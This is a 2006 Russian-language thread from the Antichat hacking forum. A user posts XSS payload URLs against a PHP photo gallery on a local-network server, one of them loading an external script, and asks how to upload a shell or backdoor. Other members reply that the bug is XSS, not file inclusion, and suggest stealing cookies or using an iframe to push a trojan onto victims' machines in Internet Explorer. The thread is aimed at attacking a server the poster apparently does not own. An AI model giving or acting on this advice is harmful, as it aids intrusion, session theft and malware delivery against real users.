HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Залить шелл?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Залить шелл?
  #1  
Старый 02.11.2006, 19:52
InterAct
Новичок
Регистрация: 20.03.2005
Сообщений: 4
С нами: 11126965

Репутация: 0
По умолчанию Залить шелл?
Привет!
В локалке есть сервак под хр sp2, на нем фото галерея PHP Photo Album by John Beatty,
На енту галерею есть сплоит

http://www.example.com/photos/showimages.php?dir=<iframe%20src="C:\"%20width=400 %20height=400></iframe>
http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1>
http://172.17.30.2/showfullimage.php?dir=&image=<script%20language=Ja vascript%20src=http://test/users/alex/tooltiq.js></script>
можно ли как залить на сервак шелл, бекдор, или как прочесть с помощь html, js… пхп файл на серваку?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 02.11.2006, 21:14
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
С нами: 10831901

Репутация: 117
По умолчанию
Никак ) Это хсс атака, а не инклюдинг.
 
Ответить с цитированием

  #3  
Старый 02.11.2006, 21:27
InterAct
Новичок
Регистрация: 20.03.2005
Сообщений: 4
С нами: 11126965

Репутация: 0
По умолчанию
Очень жаль (. Что самое пакостное можно сделать с этим?
Последний раз редактировалось InterAct; 02.11.2006 в 21:30..
 
Ответить с цитированием

  #4  
Старый 02.11.2006, 23:25
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
С нами: 10578566

Репутация: 1228


По умолчанию
Цитата:
Сообщение от InterAct  
Очень жаль (. Что самое пакостное можно сделать с этим?
украсть куки если XSS в профиле! или загрузить какойнить файл на комп юзера впарив ему ссылку (правд тут есть пару нюансов)
 
Ответить с цитированием

  #5  
Старый 02.11.2006, 23:58
InterAct
Новичок
Регистрация: 20.03.2005
Сообщений: 4
С нами: 11126965

Репутация: 0
По умолчанию
давай сюда нюансы
 
Ответить с цитированием

  #6  
Старый 03.11.2006, 00:16
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
С нами: 10578566

Репутация: 1228


По умолчанию
Использую Xss ты можеш создать фрейм в который будет подружаться твоя страничка, собсно которая будет загружать сам файл (трой) на комп жертвы, но это возможно не во всех браузерах а конкретно в Ie, и во многом зависит от настроек юзера!

А ваше посмотри видео про XSS СКАЧАТЬ
Последний раз редактировалось nc.STRIEM; 03.11.2006 в 00:22..
 
Ответить с цитированием

  #7  
Старый 03.11.2006, 02:06
InterAct
Новичок
Регистрация: 20.03.2005
Сообщений: 4
С нами: 11126965

Репутация: 0
По умолчанию
Спасибо! Посмотрим )
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как залить шелл в vBulletin v3.6.0? Elenberg Уязвимости CMS / форумов 19 06.02.2009 10:00
Подскажите альтернативный способ залить шелл. _link Уязвимости CMS / форумов 1 11.03.2006 07:47
ExBB 1.9.1 - залить шелл TweakeR Уязвимости CMS / форумов 9 09.02.2006 12:29
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Уязвимости CMS / форумов 25 13.04.2005 15:37
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.